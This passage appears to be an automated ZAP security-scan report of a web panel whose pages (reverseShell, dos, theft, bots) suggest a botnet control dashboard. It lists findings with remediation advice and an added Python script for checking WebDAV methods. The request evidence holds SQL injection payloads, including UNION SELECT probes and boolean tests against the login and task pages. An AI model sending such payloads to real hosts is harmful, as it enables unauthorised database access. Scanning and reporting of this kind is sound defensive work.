Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 234 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 24
Solution
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-SESS-02
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90027
Informational
GET for POST
Description
A request that was originally observed as a POST was also accepted as a GET. This issue does not represent a security weakness unto itself, however, it may facilitate simplification of other attacks. For example if the original POST is subject to Cross-Site Scripting (XSS), then this finding may indicate that a simplified (GET based) XSS may also be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?password=ZAP&secret=&username=ZAP HTTP/1.1
Request Header - size: 502 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=%5C'%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%5C'a%5C')%20--%20-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd&username=RawPHP HTTP/1.1
Request Header - size: 1,132 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password='UNION%20SELECT%20NULL,NULL,NULL%20--%20-%20--%20-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd&username=RawPHP HTTP/1.1
Request Header - size: 1,059 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password='UNION%20SELECT%20NULL,NULL,NULL%20--%20-%20--%20-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd&username=RawPHP%22)%20AND%208723=8723%2516 HTTP/1.1
Request Header - size: 1,081 bytes.
Request Body - size: 0 bytes.
Response Header - size: 333 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP HTTP/1.1
Request Header - size: 432 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9 HTTP/1.1
Request Header - size: 690 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence GET http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit='%20UNION%20SELECT%20@@version%20--%20-&params='%20UNION%20SELECT%20@@version%20--%20-&task_select=1&unit_EXEC=18.9 HTTP/1.1
Request Header - size: 974 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 7
Solution
Ensure that only POST is accepted where POST is expected.
Reference
Tags OWASP_2021_A04
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 16
WASC Id 20
Plugin Id 10058
Informational
Information Disclosure - Sensitive Information in URL
Description
The request appeared to contain sensitive information leaked in the URL. This can violate PCI and most organizational compliance policies. You can configure the list of strings for this check to add or remove values specific to your environment.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter password
Attack
Evidence password
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter username
Attack
Evidence username
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter password
Attack
Evidence password
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter username
Attack
Evidence username
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
Instances 4
Solution
Do not pass sensitive information in URIs.
Reference
Tags OWASP_2021_A01
OWASP_2017_A03
CWE Id 200
WASC Id 13
Plugin Id 10024
Informational
Information Disclosure - Suspicious Comments
Description
The response appears to contain suspicious comments which may help an attacker. Note: Matches made within script blocks or files are against the entire content not only comments.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence from
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence User
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
Instances 5
Solution
Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.
Reference
Tags OWASP_2021_A01
WSTG-v42-INFO-05
OWASP_2017_A03
CWE Id 200
WASC Id 13
Plugin Id 10027
Informational
Insecure HTTP Method - COPY
Description
This HTTP method is a WEBDAV method: COPY. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method COPY
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 769 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Disable WebDAV methods, and any other HTTP method the application does not use, at the web server rather than in the application: in Apache, leave mod_dav unloaded and restrict the document root with a LimitExcept block that allows only GET, HEAD and POST; in nginx, return 405 for any request_method outside that set. Then confirm with an OPTIONS request that the Allow header no longer lists COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK or UNLOCK.

Caveat before treating this as real WebDAV exposure: the evidence is only a 200 status, and the 3,435-byte response body is the same size as a plain GET of login.php, which is what a PHP handler returns when it ignores the request verb. A server that actually speaks WebDAV answers PROPFIND with 207 Multi-Status and advertises a DAV header on OPTIONS.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - LOCK
Description
This HTTP method is a WEBDAV method: LOCK. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method LOCK
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 769 bytes.
Request Body - size: 0 bytes.
Response Header - size: 256 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Disable WebDAV methods, and any other HTTP method the application does not use, at the web server rather than in the application: in Apache, leave mod_dav unloaded and restrict the document root with a LimitExcept block that allows only GET, HEAD and POST; in nginx, return 405 for any request_method outside that set. Then confirm with an OPTIONS request that the Allow header no longer lists COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK or UNLOCK.

Caveat before treating this as real WebDAV exposure: the evidence is only a 200 status, and the 3,435-byte response body is the same size as a plain GET of login.php, which is what a PHP handler returns when it ignores the request verb. A server that actually speaks WebDAV answers PROPFIND with 207 Multi-Status and advertises a DAV header on OPTIONS.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - MKCOL
Description
This HTTP method is a WEBDAV method: MKCOL. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method MKCOL
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 770 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Disable WebDAV methods, and any other HTTP method the application does not use, at the web server rather than in the application: in Apache, leave mod_dav unloaded and restrict the document root with a LimitExcept block that allows only GET, HEAD and POST; in nginx, return 405 for any request_method outside that set. Then confirm with an OPTIONS request that the Allow header no longer lists COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK or UNLOCK.

Caveat before treating this as real WebDAV exposure: the evidence is only a 200 status, and the 3,435-byte response body is the same size as a plain GET of login.php, which is what a PHP handler returns when it ignores the request verb. A server that actually speaks WebDAV answers PROPFIND with 207 Multi-Status and advertises a DAV header on OPTIONS.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - MOVE
Description
This HTTP method is a WEBDAV method: MOVE. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method MOVE
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 769 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Disable WebDAV methods, and any other HTTP method the application does not use, at the web server rather than in the application: in Apache, leave mod_dav unloaded and restrict the document root with a LimitExcept block that allows only GET, HEAD and POST; in nginx, return 405 for any request_method outside that set. Then confirm with an OPTIONS request that the Allow header no longer lists COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK or UNLOCK.

Caveat before treating this as real WebDAV exposure: the evidence is only a 200 status, and the 3,435-byte response body is the same size as a plain GET of login.php, which is what a PHP handler returns when it ignores the request verb. A server that actually speaks WebDAV answers PROPFIND with 207 Multi-Status and advertises a DAV header on OPTIONS.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - PROPFIND
Description
This HTTP method is a WEBDAV method: PROPFIND. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method PROPFIND
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 773 bytes.
Request Body - size: 0 bytes.
Response Header - size: 256 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Disable WebDAV methods, and any other HTTP method the application does not use, at the web server rather than in the application: in Apache, leave mod_dav unloaded and restrict the document root with a LimitExcept block that allows only GET, HEAD and POST; in nginx, return 405 for any request_method outside that set. Then confirm with an OPTIONS request that the Allow header no longer lists COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK or UNLOCK.

Caveat before treating this as real WebDAV exposure: the evidence is only a 200 status, and the 3,435-byte response body is the same size as a plain GET of login.php, which is what a PHP handler returns when it ignores the request verb. A server that actually speaks WebDAV answers PROPFIND with 207 Multi-Status and advertises a DAV header on OPTIONS.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - PROPPATCH
Description
This HTTP method is a WEBDAV method: PROPPATCH. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method PROPPATCH
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 774 bytes.
Request Body - size: 0 bytes.
Response Header - size: 256 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Disable WebDAV methods, and any other HTTP method the application does not use, at the web server rather than in the application: in Apache, leave mod_dav unloaded and restrict the document root with a LimitExcept block that allows only GET, HEAD and POST; in nginx, return 405 for any request_method outside that set. Then confirm with an OPTIONS request that the Allow header no longer lists COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK or UNLOCK.

Caveat before treating this as real WebDAV exposure: the evidence is only a 200 status, and the 3,435-byte response body is the same size as a plain GET of login.php, which is what a PHP handler returns when it ignores the request verb. A server that actually speaks WebDAV answers PROPFIND with 207 Multi-Status and advertises a DAV header on OPTIONS.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Informational
Insecure HTTP Method - UNLOCK
Description
This HTTP method is a WEBDAV method: UNLOCK. If this server is not offering any WEBDAV services, these methods should not be available.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method UNLOCK
Parameter
Attack
Evidence response code 200 for insecure HTTP METHOD
Request Header - size: 771 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Disable WebDAV methods, and any other HTTP method the application does not use, at the web server rather than in the application: in Apache, leave mod_dav unloaded and restrict the document root with a LimitExcept block that allows only GET, HEAD and POST; in nginx, return 405 for any request_method outside that set. Then confirm with an OPTIONS request that the Allow header no longer lists COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK or UNLOCK.

Caveat before treating this as real WebDAV exposure: the evidence is only a 200 status, and the 3,435-byte response body is the same size as a plain GET of login.php, which is what a PHP handler returns when it ignores the request verb. A server that actually speaks WebDAV answers PROPFIND with 207 Multi-Status and advertises a DAV header on OPTIONS.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
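All seven Insecure HTTP Method alerts above rest on the same evidence: a 200 status with a body the same size as a GET of login.php. The following Python is an added example for this report, not code from ZAP or from the scanned panel. It classifies per-method responses so that a handler that merely ignores the verb is not reported as WebDAV, and it can probe a URL you supply over plain HTTP (as the scanned URLs use). The verdict names, the WEBDAV_METHODS list and the response bodies used in the test are this example's own constructions.

```python
"""Tell real WebDAV exposure from a handler that ignores the request verb.

Added example for this report; it is not code from ZAP or from the scanned
panel. Verdict names and the WEBDAV_METHODS list are this example's choices.
"""
from dataclasses import dataclass
from http.client import HTTPConnection
from typing import Dict, List, Optional
from urllib.parse import urlsplit

WEBDAV_METHODS = ("PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK")


@dataclass
class Probe:
    method: str
    status: int
    headers: Dict[str, str]   # header names lower-cased
    body: bytes


def classify(get: Probe, probes: List[Probe], options: Optional[Probe] = None) -> Dict[str, str]:
    """Return one verdict per probed method.

    webdav        the server spoke WebDAV: 207 Multi-Status, a DAV header,
                  or the method is listed in the OPTIONS Allow header
    verb-ignored  2xx with a body identical to the GET body, i.e. the
                  application ran as if the request were a GET
    accepted      2xx with a different body; review by hand
    rejected      anything else (405, 501, 403, ...)
    """
    allowed = set()
    if options is not None:
        allowed = {m.strip().upper() for m in options.headers.get("allow", "").split(",") if m.strip()}
    verdicts: Dict[str, str] = {}
    for p in probes:
        m = p.method.upper()
        if p.status == 207 or "dav" in p.headers or m in allowed:
            verdicts[m] = "webdav"
        elif 200 <= p.status < 300 and p.body == get.body:
            verdicts[m] = "verb-ignored"
        elif 200 <= p.status < 300:
            verdicts[m] = "accepted"
        else:
            verdicts[m] = "rejected"
    return verdicts


def fetch(url: str, method: str, timeout: float = 10.0) -> Probe:
    """Send one request with the standard library and capture the response (plain HTTP only)."""
    u = urlsplit(url)
    path = (u.path or "/") + ("?" + u.query if u.query else "")
    conn = HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    try:
        conn.request(method, path)
        resp = conn.getresponse()
        return Probe(method, resp.status, {k.lower(): v for k, v in resp.getheaders()}, resp.read())
    finally:
        conn.close()


def probe_url(url: str) -> Dict[str, str]:
    """Live check: GET and OPTIONS as baselines, then each WebDAV method."""
    get = fetch(url, "GET")
    options = fetch(url, "OPTIONS")
    return classify(get, [fetch(url, m) for m in WEBDAV_METHODS], options)


if __name__ == "__main__":
    import sys
    for method, verdict in sorted(probe_url(sys.argv[1]).items()):
        print(f"{method:10s} {verdict}")
```

Run it as `python probe.py http://host/path/login.php` against a host you are authorised to test; a column of verb-ignored verdicts means the finding is a PHP handler answering every verb, not a WebDAV service.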
Informational
Modern Web Application
Description
The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <script> var dashboard = document.getElementById("dashboard"); var bots = document.getElementById("bots"); var dos = document.getElementById("dos"); var theft = document.getElementById("theft"); var settings = document.getElementById("settings"); var tasks = document.getElementById('tasks'); var watchdog = document.getElementById('watchdog'); var manager = document.getElementById('manager'); function retrieveResult() { var xmlReq = new XMLHttpRequest(); var url = "gate.php?bot=" + "DESKTOP-95IQEEV"; xmlReq.onreadystatechange = function() { if (xmlReq.readyState == 4 && xmlReq.status == 200) { if (xmlReq.responseText.length > 2) { document.getElementById("resultArea").innerHTML = ''; document.getElementById("resultArea").innerHTML = xmlReq.responseText; } } }; xmlReq.open("GET", url, true); xmlReq.send(); setTimeout(retrieveResult, 2000); } retrieveResult(); const userId = 54; const REDIRECT = (page) => { if (userId) { window.location.href = `${page}?id=${userId}`; } else { console.error("User ID not available"); window.location.href = page; } }; dashboard.addEventListener("click", () => { REDIRECT("dashboard.php"); }); tasks.addEventListener("click", () => { REDIRECT("tasks_page.php"); }); watchdog.addEventListener("click", () => { REDIRECT("watchdog.php"); }); manager.addEventListener("click", () => { REDIRECT("manager.php"); }); bots.addEventListener("click", () => { REDIRECT("Bots.php"); }); dos.addEventListener("click", () => { REDIRECT("dos.php"); }); theft.addEventListener("click", () => { REDIRECT("theft.php"); }); settings.addEventListener("click", () => { REDIRECT("settings_page.php"); }); </script>
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence <script> var dashboard = document.getElementById("dashboard"); var bots = document.getElementById("bots"); var dos = document.getElementById("dos"); var theft = document.getElementById("theft"); var settings = document.getElementById("settings"); var tasks = document.getElementById('tasks'); var watchdog = document.getElementById('watchdog'); var manager = document.getElementById('manager'); function retrieveResult() { var xmlReq = new XMLHttpRequest(); var url = "gate.php?bot=" + "DESKTOP-95IQEEV"; xmlReq.onreadystatechange = function() { if (xmlReq.readyState == 4 && xmlReq.status == 200) { if (xmlReq.responseText.length > 2) { document.getElementById("resultArea").innerHTML = ''; document.getElementById("resultArea").innerHTML = xmlReq.responseText; } } }; xmlReq.open("GET", url, true); xmlReq.send(); setTimeout(retrieveResult, 2000); } retrieveResult(); const userId = 54; const REDIRECT = (page) => { if (userId) { window.location.href = `${page}?id=${userId}`; } else { console.error("User ID not available"); window.location.href = page; } }; dashboard.addEventListener("click", () => { REDIRECT("dashboard.php"); }); tasks.addEventListener("click", () => { REDIRECT("tasks_page.php"); }); watchdog.addEventListener("click", () => { REDIRECT("watchdog.php"); }); manager.addEventListener("click", () => { REDIRECT("manager.php"); }); bots.addEventListener("click", () => { REDIRECT("Bots.php"); }); dos.addEventListener("click", () => { REDIRECT("dos.php"); }); theft.addEventListener("click", () => { REDIRECT("theft.php"); }); settings.addEventListener("click", () => { REDIRECT("settings_page.php"); }); </script>
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
Instances 6
Solution
This is an informational alert and so no changes are required.
Reference
Tags
CWE Id
WASC Id
Plugin Id 10109
Informational
Non-Storable Content
Description
The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence 403
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence 403
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
